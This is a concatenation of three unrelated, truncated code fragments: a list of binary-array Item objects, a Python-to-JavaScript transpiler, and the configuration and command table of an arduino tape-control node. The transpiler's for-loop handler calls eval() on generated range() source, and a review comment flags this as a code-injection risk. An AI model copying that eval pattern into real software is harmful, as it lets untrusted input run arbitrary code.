0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item3 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item4 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item5 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item6 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item7 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item8 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item9 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item10 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, | |
import ast
import decimal
from collections.abc import Iterable
#TODO
"""
- implement imports: make python modules using es3 js module pattern
- implement builtins/exc: make map of builtins and exceptions to js
"""
GLOBALS = set()  # names declared via `global`; reserved for the planned JS module-pattern output (see TODO above)
def SubscriptPrint(node, nodemap):
    """Emit JS for a subscript: the value expression followed by its slice/index code."""
    return "{}{}".format(generate_code(node.value), generate_code(node.slice))
def ExtSlicePrint(node, nodemap):
    """Multi-dimensional (extended) slices have no JS equivalent; always raise."""
    raise SyntaxError("Complex slicing is not supported by JavaScript")
def SlicePrint(node, nodemap):
    """Emit a JS .slice(lower[, upper]) call for a Python slice node.

    Raises SyntaxError for stepped slices, which Array.prototype.slice
    cannot express.
    """
    if node.step:
        raise SyntaxError("Slicing by step is not supported by JavaScript")
    lower = generate_code(node.lower) if node.lower else 0
    upper = generate_code(node.upper) if node.upper else None
    # Compare against None explicitly: generate_code may legitimately return
    # falsy code such as 0 for `x[a:0]`; the original `if not u` check dropped
    # that bound and emitted .slice(a), slicing to the end instead.
    if upper is None:
        return f".slice({lower})"
    return f".slice({lower},{upper})"
def IndexPrint(node, nodemap):
    """Emit a JS bracket index, e.g. obj[expr]."""
    inner = generate_code(node.value)
    return f"[{inner}]"
def AttributePrint(node, nodemap):
    """Emit JS dotted attribute access: value.attr."""
    # TODO replace append with push, remove with pop, etc.
    owner = generate_code(node.value)
    return f"{owner}.{node.attr}"
def IfExpPrint(node, nodemap):
    """Emit a JS ternary (`test ? body : orelse`) for a conditional expression.

    NOTE(review): the result ends with ';' even though an IfExp is an
    expression that may be nested inside a larger one — confirm callers only
    use it in statement position.
    """
    ifexpr = generate_code(node.test)
    body, orelse = generate_code(node.body), generate_code(node.orelse)
    return f"{ifexpr} ? {body}:{orelse};"
def StarredPrint(node, nodemap):
    """Starred expressions (packing/unpacking) cannot be translated; always raise."""
    raise SyntaxError("JavaScript does not support packing or unpacking")
def DeletePrint(node, nodemap):
    """Emit a JS delete statement covering every deletion target."""
    rendered = ",".join(str(generate_code(target)) for target in node.targets)
    return f"delete {rendered};"
def CallPrint(node, nodemap):
    """Emit a JS call: the callee followed by comma-separated positional args.

    Only node.args is rendered; keyword arguments are not handled here.
    """
    callee = generate_code(node.func)
    rendered_args = ",".join(str(generate_code(arg)) for arg in node.args)
    return f"{callee}({rendered_args});"
def keywordPrint(node, nodemap):
    """Emit a quoted 'key':value pair for a keyword argument."""
    rendered = generate_code(node.value)
    return f"'{node.arg}':{rendered}"
def NotInPrint(node, nodemap):
    """`not in` has no single JS operator; ComparePrint rewrites it as !(x in y)."""
    return None
def InPrint(node, nodemap):
    """Membership test maps to the JS `in` operator."""
    return "in"
def IsNotPrint(node, nodemap):
    """Identity inequality maps to JS strict inequality."""
    return "!=="
def IsPrint(node, nodemap):
    """Identity maps to JS strict equality."""
    return "==="
def GtEPrint(node, nodemap):
    """Greater-or-equal operator."""
    return ">="
def GtPrint(node, nodemap):
    """Greater-than operator."""
    return ">"
def LtEPrint(node, nodemap):
    """Less-or-equal operator."""
    return "<="
def LtPrint(node, nodemap):
    """Less-than operator."""
    return "<"
def NotEqPrint(node, nodemap):
    """Loose inequality (JS `!=`)."""
    return "!="
def EqPrint(node, nodemap):
    """Loose equality (JS `==`)."""
    return "=="
def ComparePrint(node, nodemap):
    """Emit a JS comparison chain, rewriting `not in` as a negated `in` test."""
    left = generate_code(node.left)
    cmpstr = str(left)
    for i in range(len(node.comparators)):
        op, comp = generate_code(node.ops[i]), generate_code(node.comparators[i])
        if isinstance(node.ops[i], ast.In):
            cmpstr = f"{cmpstr} {op} {comp}"
        elif isinstance(node.ops[i], ast.NotIn):
            # get left comparator, slice left comparator out of str,
            # build str with previous compares and negated in compare
            # (JS has no `not in`, so `a not in b` becomes `!(a in b)`)
            leftcomp = cmpstr[cmpstr.rfind(" ") + 1:]
            cmpstr = cmpstr[:cmpstr.rfind(" ") + 1]
            cmpstr = f"{cmpstr} !({leftcomp} in {comp})"
        else:
            cmpstr = f"{cmpstr} {op} {comp}"
    return cmpstr
def AddPrint(node, nodemap):
    """Addition operator."""
    return "+"
def SubPrint(node, nodemap):
    """Subtraction operator."""
    return "-"
def MultPrint(node, nodemap):
    """Multiplication operator."""
    return "*"
def DivPrint(node, nodemap):
    """True division operator."""
    return "/"
def FloorDivPrint(node, nodemap):
    """Floor division emits plain '/'; BinOpPrint wraps the expression in Math.floor()."""
    return "/"
def ModPrint(node, nodemap):
    """Modulo operator."""
    return "%"
def PowPrint(node, nodemap):
    """Returns None: BinOpPrint special-cases Pow and emits Math.pow() itself."""
    return None
def LShiftPrint(node, nodemap):
    """Bitwise left shift."""
    return "<<"
def RShiftPrint(node, nodemap):
    """Bitwise (sign-propagating) right shift."""
    return ">>"
def BitOrPrint(node, nodemap):
    """Bitwise OR."""
    return "|"
def BitXorPrint(node, nodemap):
    """Bitwise XOR."""
    return "^"
def BitAndPrint(node, nodemap):
    """Bitwise AND."""
    return "&"
def MatMultPrint(node, nodemap):
    """The '@' operator has no JS counterpart; always raise."""
    raise SyntaxError("Compiler does not support Matrix Multiplication Binary Operator '@'")
def BinOpPrint(node, nodemap):
    """Emit JS for a binary operation, special-casing ** and //.

    Pow becomes Math.pow(left, right); FloorDiv becomes Math.floor((left/right)).
    """
    left = generate_code(node.left)
    right = generate_code(node.right)
    op = generate_code(node.op)
    if isinstance(node.op, ast.Pow):
        return f"Math.pow({left}, {right})"
    if isinstance(node.op, ast.FloorDiv):
        return f"Math.floor(({left}{op}{right}))"
    return f"{left}{op}{right}"
def NotPrint(node, nodemap):
    """Logical negation maps to JS `!`."""
    return "!"
def UnaryOpPrint(node, nodemap):
    """Emit the unary operator immediately followed by its operand."""
    return f"{generate_code(node.op)}{generate_code(node.operand)}"
def BoolOpPrint(node, nodemap):
    """Emit a JS boolean expression joined by && or ||.

    Python collapses chained `and`/`or` (e.g. `a or b or c`) into a single
    BoolOp whose .values holds ALL operands, so join every one of them. The
    original unpacked exactly two values and raised ValueError on chains of
    three or more.
    """
    joiner = " {} ".format(generate_code(node.op))
    return joiner.join(str(generate_code(value)) for value in node.values)
def OrPrint(node, nodemap):
    """Logical OR operator."""
    return "||"
def AndPrint(node, nodemap):
    """Logical AND operator."""
    return "&&"
def DictPrint(node, nodemap):
    """Render a dict literal's keys and values to code fragments.

    NOTE(review): unlike the other printers this returns a Python dict rather
    than a JS source string — confirm how callers serialize it before relying
    on the emitted form.
    """
    keys = [generate_code(el) for el in node.keys]
    values = [generate_code(el) for el in node.values]
    return dict(zip(keys, values))
def SetPrint(node, nodemap):
    """Emit a JS array literal for a Python set literal.

    NOTE(review): deduplicating via set() makes element order in the emitted
    code non-deterministic — confirm that is acceptable.
    """
    elts = ",".join(set(generate_code(el) for el in node.elts))
    return f"[{elts}]"
def ListPrint(node, nodemap):
    """Emit a JS array literal from a Python list literal."""
    inner = ",".join(str(generate_code(item)) for item in node.elts)
    return f"[{inner}]"
def TuplePrint(node, nodemap):
    """Emit a JS array literal from a Python tuple literal (JS has no tuples)."""
    inner = ",".join(str(generate_code(item)) for item in node.elts)
    return f"[{inner}]"
def NamePrint(node, nodemap):
    """Emit a JS identifier, translating Python's `self` to `this`.

    The original used `node.id.find("self") < 0`, which rewrote ANY
    identifier merely containing "self" (e.g. `selfie`, `_self_ref`) to
    `this`; only the exact identifier `self` should be translated.
    """
    return "this" if node.id == "self" else node.id
def FormattedValuePrint(node, nodemap):
    """Emit the code for the expression inside an f-string placeholder."""
    return generate_code(node.value)
def ConstantPrint(node, nodemap):
    """Emit a JS literal for a Python constant.

    Numbers pass through unchanged, strings are double-quoted, and
    True/False/None map to true/false/null. type() is used deliberately
    instead of isinstance(): isinstance(True, int) is true, but booleans
    must take the keyword branch.
    """
    kind = type(node.value)
    if kind in (int, float, decimal.Decimal):
        return node.value
    if kind is str:
        return f'"{node.value}"'
    return {True: "true", False: "false", None: "null"}[node.value]
def JoinedStrPrint(node, nodemap):
    """Emit JS string concatenation ('+'-joined parts) for an f-string.

    Uses str.join instead of the original append-then-trim loop, whose
    `strval[-1]` check raised IndexError for an f-string with no parts.
    """
    return "+".join(f"{generate_code(part)}" for part in node.values)
def ReturnPrint(node, nodemap):
    """Emit a JS return statement for the (possibly absent) return value."""
    value = generate_code(node.value)
    return f"return {value};"
def FunctionDefPrint(node, nodemap):
    """Emit a JS function for a FunctionDef (also reused by LambdaPrint).

    FunctionDef bodies are lists and take the Iterable branch; Lambda bodies
    are a single expression and take the else branch (Lambda also has no
    .name attribute, hence the getattr default).
    """
    name = getattr(node, "name", "")
    args = generate_code(node.args)
    fn = f"function {name}({args}){{"
    if isinstance(node.body, Iterable):
        fnbody = "".join([str(generate_code(node)) for node in node.body])
        # NOTE(review): node.returns is the return *annotation*; appending its
        # generated code after the body looks unintended — confirm.
        retstr = generate_code(node.returns)
        fn += f"{fnbody}{retstr}}}"
    else:
        fn += f"return {str(generate_code(node.body))}}}"
    return fn
def LambdaPrint(node, nodemap):
    """Emit a Lambda as an anonymous JS function via FunctionDefPrint."""
    return FunctionDefPrint(node, nodemap)
def AssignPrint(node, nodemap):
    """Emit JS assignment(s).

    `a, b = 1, 2` style multi-assignment is expanded element-wise; true
    unpacking (mismatched lengths, or a tuple/list target fed from a
    non-literal value) is rejected.
    """
    # plain name targets get a `var` declaration
    asnstr = "var " if isinstance(node.targets[0], ast.Name) else ""
    target_elts = getattr(node.targets[0], "elts", None)
    value_elts = getattr(node.value, "elts", None)
    # Element-wise expansion applies only when BOTH sides are literal
    # tuples/lists of equal length. The original compared lengths using
    # defaults ([] vs [None]) without checking the target actually has .elts,
    # so `x = [5]` (a one-element literal assigned to a plain name) crashed
    # with AttributeError on node.targets[0].elts.
    if target_elts is not None and value_elts is not None and len(value_elts) == len(target_elts):
        pairs = []
        for tgt, val in zip(target_elts, value_elts):
            pairs.append(f"{generate_code(tgt)}={generate_code(val)}")
        asnstr += ",".join(pairs) + ";"
    elif any(isinstance(t, (ast.List, ast.Tuple)) for t in node.targets):
        raise SyntaxError("Unpacking is not currently supported")
    else:
        target, val = generate_code(node.targets[0]), generate_code(node.value)
        asnstr += f"{target}={val};"
    # `this.x = ...` must not carry a `var` declaration
    if asnstr.find("this") > -1:
        asnstr = asnstr.replace("var", "")
    return asnstr
def AugAssignPrint(node, nodemap):
    """Emit JS for augmented assignment, expanding **= and //= explicitly."""
    target = generate_code(node.target)
    op = generate_code(node.op)
    value = generate_code(node.value)
    if isinstance(node.op, ast.Pow):
        return f"{target} = Math.pow({target}, {value});"
    if isinstance(node.op, ast.FloorDiv):
        return f"{target} = Math.floor(({target}{op}{value}));"
    return f"{target}{op}={value};"
def RaisePrint(node, nodemap):
    """Emit a JS throw; a bare `raise` rethrows the catch variable `_`."""
    if node.exc:
        return f"throw {generate_code(node.exc)};"
    return "throw _;"
def AssertPrint(node, nodemap):
    """Drop asserts: lets clients assert in Python without affecting the JS output."""
    # allows client to make assertions without effecting js
    return ""
def PassPrint(node, nodemap):
    """Drop `pass`: JS blocks need no placeholder statement."""
    # allows client to make passes without effecting js
    return ""
def BreakPrint(node, nodemap):
    """JS break statement."""
    return "break;"
def ContinuePrint(node, nodemap):
    """JS continue statement."""
    return "continue;"
def IfPrint(node, nodemap):
    """Emit a JS if/else-if/else chain.

    An elif chain arrives as a nested If node inside orelse; a missing else
    clause arrives as an empty orelse list. The original indexed
    node.orelse[0] unconditionally and raised IndexError on any plain `if`
    without an else.
    """
    cmptest = generate_code(node.test)
    ifbody = "".join(str(generate_code(child)) for child in node.body)
    ifstr = f"if({cmptest}){{{ifbody}}}"
    if not node.orelse:
        return ifstr
    if isinstance(node.orelse[0], ast.If):  # If nodes for orelse = elif
        elifstr = "".join(str(IfPrint(child, nodemap)) for child in node.orelse)
        return f"{ifstr}else {elifstr}"
    # else body of nodes
    elsebody = "".join(str(generate_code(child)) for child in node.orelse)
    return f"{ifstr}else{{{elsebody}}}"
def WhilePrint(node, nodemap):
    """Emit a JS while loop."""
    condition = generate_code(node.test)
    body = "".join(generate_code(child) for child in node.body)
    return f"while({condition}){{{body}}}"
def ForPrint(node, nodemap):
    """Emit a JS for loop; `for x in range(...)` becomes a C-style counter loop."""
    iter_ = generate_code(node.iter)
    # enum_ is never assigned below — presumably reserved for enumerate support
    range_, enum_ = None, None
    if iter_.find("range(") > -1:
        # SECURITY(review): eval() re-executes the generated range() source
        # (iter_[:-1] strips the trailing ';' CallPrint appends). This runs
        # arbitrary code if the range arguments are attacker-controlled —
        # confirm inputs are trusted.
        range_ = eval(iter_[:-1])
    target = generate_code(node.target)
    if range_:
        forstr = f"for(var {target}={range_.start};{target}<{range_.stop};{target}+={range_.step}){{"
    else:
        # generic iteration: JS for-in yields indices, so re-read the element
        forstr = f"for(var {target} in {iter_}){{{target} = {iter_}[{target}];"
    forbody = "".join([str(generate_code(node)) for node in node.body])
    forstr += f"{forbody}}}"
    return forstr
def withitemPrint(node, nodemap):
    """Emit JS for one `with` item: optional alias binding plus an __enter__ call.

    The original concatenated "var a = ctx" directly with "a.__enter__();",
    producing invalid JS like `var a = ctxa.__enter__();` — the ';'
    terminating the alias binding was missing.
    """
    withitemstr = ""
    name, alias = generate_code(node.context_expr), None
    if node.optional_vars:
        alias = generate_code(node.optional_vars)
        withitemstr = f"var {alias} = {name};"
    return f"{withitemstr}{alias or name}.__enter__();"
def WithPrint(node, nodemap):
    """Emit JS for a `with` block: __enter__ calls, the body, then __exit__ calls."""
    def withitemAlias(node):
        # name the item by its `as` alias when present, else by the context expression
        name = None
        if node.optional_vars:
            name = generate_code(node.optional_vars)
        else:
            name = generate_code(node.context_expr)
        return name
    itemaliases = [withitemAlias(node) for node in node.items]
    # NOTE(review): __exit__ calls are appended unconditionally after the
    # body, so they do not run if the body throws — unlike Python's `with`.
    exitmethods = "".join([f"{alias}.__exit__(null, null, null);" for alias in itemaliases])
    items = "".join([str(withitemPrint(node, nodemap)) for node in node.items])
    withbody = "".join([str(generate_code(node)) for node in node.body])
    return f"{items}{withbody}{exitmethods}"
def TryPrint(node, nodemap):
    """Emit JS try/catch/finally.

    JS allows at most one catch clause, so multiple handlers are rejected.
    A try/finally with no except clause is emitted without a catch — the
    original indexed node.handlers[0] unconditionally and raised IndexError
    on it.
    """
    trybody = "".join(str(generate_code(child)) for child in node.body)
    trystr = f"try{{{trybody}}}"
    if len(node.handlers) > 1:
        raise SyntaxError(f"JavaScript only allows for a single handler, you have {len(node.handlers)} handlers")
    if node.handlers:
        trystr += generate_code(node.handlers[0])
    # an empty `finally{}` is valid JS, so it is always emitted
    finalbody = "".join(str(generate_code(child)) for child in node.finalbody)
    return f"{trystr}finally{{{finalbody}}}"
def ExceptHandlerPrint(node, nodemap):
    """Emit a JS catch block; an unnamed handler binds the exception to `_`."""
    bound = node.name or "_"
    body = "".join(generate_code(child) for child in node.body)
    return f"catch({bound}){{{body}}}"
def argumentsPrint(node, nodemap):
    """Emit the comma-separated JS parameter list, dropping `self`."""
    # TODO fix kwargs, add if checks for null arg and put default
    names = [a.arg for a in node.args if a.arg != "self"]
    return ",".join(names)
def argPrint(node, nodemap):
    """Emit a single parameter name."""
    return str(node.arg)
def YieldPrint(node, nodemap):
    """Generators are not translated; always raise."""
    raise SyntaxError("Yield not supported")
def YieldFromPrint(node, nodemap):
    """Delegating generators are not translated; always raise."""
    raise SyntaxError("YieldFrom not supported")
def NonlocalPrint(node, nodemap):
    """Dropped: JS closures already see enclosing-scope variables."""
    return ""
def GlobalPrint(node, nodemap):
    """Dropped from output; registering into GLOBALS is still a TODO."""
    # add to globals for js module pattern
    return ""
def ClassDefPrint(node, nodemap):
    """Emit a JS prototype-style class from a Python ClassDef.

    The `__init__` method becomes the JS constructor function; other
    methods are attached to the prototype, and class-level assignments
    become static properties on the constructor.

    Bug fixes vs. the original:
    - `value[value.index("=") + 1]` kept only ONE character after the `=`;
      it is now a slice so the full right-hand side is kept.
    - A class without an explicit `__init__` raised KeyError; an empty
      constructor is now synthesized instead.
    - `'bases': [bases]` double-wrapped the (already-list) bases.

    Raises:
        SyntaxError: for class-body statements other than methods and
            simple assignments.
    """
    bases = [generate_code(base) for base in node.bases]
    classdef = {'name': node.name, 'bases': bases, 'body': {'fns': {}, 'static': {}}}
    for propnode in node.body:
        if isinstance(propnode, ast.FunctionDef):
            classdef['body']['fns'][propnode.name] = generate_code(propnode)
        elif isinstance(propnode, ast.Assign):
            name = propnode.targets[0].id
            value = generate_code(propnode)
            # keep everything after the '=' (the assigned expression)
            classdef['body']['static'][name] = value[value.index("=") + 1:]
        else:
            raise SyntaxError(f'ClassDef node "{propnode}" not recognized')
    init = classdef['body']['fns'].pop('__init__', None)
    if init is not None:
        classstr = init.replace('__init__', classdef["name"])
    else:
        # no __init__: synthesize an empty constructor
        classstr = f"function {classdef['name']}(){{}}"
    for type_ in classdef["body"]:
        for k, v in classdef["body"][type_].items():
            if type_ == 'fns':
                classstr += f"{classdef['name']}.prototype.{k}={v};"
            elif type_ == 'static':
                classstr += f"{classdef['name']}.{k}={v};"
    return classstr
_nodemap = {
type(None): lambda a,b:"",
ast.FunctionDef: FunctionDefPrint,
ast.JoinedStr: JoinedStrPrint,
ast.Constant: ConstantPrint,
ast.FormattedValue: FormattedValuePrint,
ast.Name: NamePrint,
ast.Assign: AssignPrint,
ast.Tuple: TuplePrint,
ast.Dict: DictPrint,
ast.List: ListPrint,
ast.Set: SetPrint,
ast.BoolOp: BoolOpPrint,
ast.Or: OrPrint,
ast.And: AndPrint,
ast.UnaryOp: UnaryOpPrint,
ast.Not: NotPrint,
ast.BinOp: BinOpPrint,
ast.Add: AddPrint,
ast.Sub: SubPrint,
ast.Mult: MultPrint,
ast.Div: DivPrint,
ast.FloorDiv: FloorDivPrint,
ast.Mod: ModPrint,
ast.Pow: PowPrint,
ast.LShift: LShiftPrint,
ast.RShift: RShiftPrint,
ast.BitOr: BitOrPrint,
ast.BitXor: BitXorPrint,
ast.BitAnd: BitAndPrint,
ast.MatMult: MatMultPrint,
ast.Compare: ComparePrint,
ast.Eq: EqPrint,
ast.NotEq: NotEqPrint,
ast.Lt: LtPrint,
ast.LtE: LtEPrint,
ast.Gt: GtPrint,
ast.GtE: GtEPrint,
ast.Is: IsPrint,
ast.IsNot: IsNotPrint,
ast.In: InPrint,
ast.NotIn: NotInPrint,
ast.Call: CallPrint,
ast.keyword: keywordPrint,
ast.Delete: DeletePrint,
ast.IfExp: IfExpPrint,
ast.Attribute: AttributePrint,
ast.Subscript: SubscriptPrint,
ast.Index: IndexPrint,
ast.Slice: SlicePrint,
| |
<gh_stars>1-10
#!/usr/bin/env python
"""
Tape movement procedure:
- tension tape
- start reel moving
- adjust to tension
- move tape
- fine tune movement (adjust tension only when out of range?)
- adjust to tension
- stop reels
- untension
What about back tension?
I think I should pull out the camera to a different node, this will mean:
- pro: no double IO connect/disconnect (arduino + camera)
- pro: simpler nodes
- con: more complex control node
Tape control node
- load/unload tape (independent control of reels, pinch drives, etc...)
- move tape (coordinated movement of tape [most likely in vacuum])
- monitor tension (checking for errors or overtension during movement)
- tension/untension (prepare for movement)
- report slot number (book-keeping requires camera as barcode reader)
- set current slot # and direction (are slot #s going up or down?)
Log everything in case of errors, especially tension!!
- tension
- position (in linear mm)
- all movements
- slot (#)
- slot spacing
Types of movement
- tension/untension reel (feed or pickup)
- feed/pickup pinch drive (feed or pickup)
- advance N mm (combined feed & pickup, pinch & reel)
- advance 1 slot (shortcut to advance N mm)
Failure modes (L6470 has stall detection, try this)
 - jam: look for overtension or skipped steps
 - broken tape: look for undertension
- slip clutch failure: look for skipped steps
- pinch drive skipped step: look for skipped steps
TODO maybe rotary encoders are called for...
Config:
 - port for arduino (for all movement and sensors)
- port for camera (usb address, serial #, etc?)
- acceptable tension
- slot # (will be overridden during movements)
- slot direction
- reel movement parameters [which of these should be in firmware?]
- speed
- accel/decel
- microstepping
- k
"""
import ctypes
import json
import os
import time
import serial
import pizco
import pycomando
from . import base
from .. import config
from ..config.checkers import require
from .. import log
# Default node configuration; user config overrides these keys.
default_config = {
    'addr': 'tcp://127.0.0.1:11030',  # pizco server address for this node
    #'loc': '/dev/ttyACM0',
    'loc': 'fake',  # arduino serial port, or 'fake' for the in-memory stub
    #'fakebarcodes': {
    #    'filename': '~/.temcagt/fake/barcodes.json',
    #    'ppmm': 130.0,
    #    'initial': [{'width': 650, 'center': 1055, 'value': 100}, ],
    #    'spacing': 780,
    #    'top': 655,
    #    'bottom': 1455,
    #    'barcode_side': 'right',  # should match tapecamera
    #},
    'baud': 115200,
    'tension_steps': 1600,
    'steps_per_mm': 2075 / 6.,
    'mms_per_second': 0.25,
    # tension values are raw sensor counts — TODO confirm scale/units
    'tension_target': 8495000,
    'untensioned_threshold': 8469000,  # untensioned if tension < this
    # untensioned is 8461749, 8461765
    'tension_range': 20000,
    'tension_step_size': 100,
    'tension_tries': 50,
    'reel_speed': 6.,
}
# pycomando command table: opcode -> {name, arg ctypes, result ctypes}.
# NOTE(review): this must stay in sync with the arduino firmware sketch.
commands = {
    0: {
        'name': 'error',
        'result': (ctypes.c_byte, ),
    },
    1: {
        'name': 'ping',
        'args': (ctypes.c_byte, ),
        'result': (ctypes.c_byte, ),
    },
    5: {
        'name': 'read_tension',
        'args': (ctypes.c_byte, ),  # TODO optional
        'result': (ctypes.c_int32, ),
    },
    6: {
        'name': 'set_led',
        'args': (ctypes.c_byte, ),
    },
    10: {
        'name': 'reset_drives',
    },
    11: {
        'name': 'get_busy',
        'args': (ctypes.c_byte, ),  # TODO optional
        'result': (ctypes.c_byte, ),
    },
    12: {
        'name': 'get_status',
        'args': (ctypes.c_byte, ),
        'result': (ctypes.c_int16, ),
    },
    13: {
        'name': 'get_position',
        'args': (ctypes.c_byte, ),
        'result': (ctypes.c_int32, ),
    },
    14: {
        'name': 'set_position',
        'args': (ctypes.c_byte, ctypes.c_int32),
    },
    15: {
        'name': 'hold_drive',
        'args': (ctypes.c_byte, ),
    },
    16: {
        'name': 'release_drive',
        'args': (ctypes.c_byte, ),
    },
    17: {
        'name': 'rotate_drive',
        'args': (ctypes.c_byte, ctypes.c_byte, ctypes.c_float),
    },
    18: {
        'name': 'set_speed',
        'args': (ctypes.c_byte, ctypes.c_float),
    },
    19: {
        'name': 'get_speed',
        'args': (ctypes.c_byte, ),
        'result': (ctypes.c_float, ),
    },
    20: {
        'name': 'move_drive',
        'args': (ctypes.c_byte, ctypes.c_byte, ctypes.c_uint32),
    },
    21: {
        'name': 'run_reels',
        'args': (ctypes.c_float, ),
    },
    22: {
        'name': 'stop_reels',
    },
    23: {
        'name': 'stop_all',
    },
    24: {
        'name': 'release_all',
    },
    25: {
        'name': 'halt_all',
    },
    30: {
        'name': 'step_tape',
        'args': (
            ctypes.c_byte, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_float,
            ctypes.c_byte),
        'result': (ctypes.c_int32, ),
    },
    31: {
        'name': 'set_tension_limits',
        'args': (ctypes.c_int32, ctypes.c_int32),
    },
    32: {
        'name': 'get_tension_limits',
        'result': (ctypes.c_int32, ctypes.c_int32),
    },
}
logger = log.get_logger(__name__)
# Drive selectors — appear to form a 2-bit field: high bit pickup vs feed
# side, low bit pinch vs reel motor (TODO confirm against firmware).
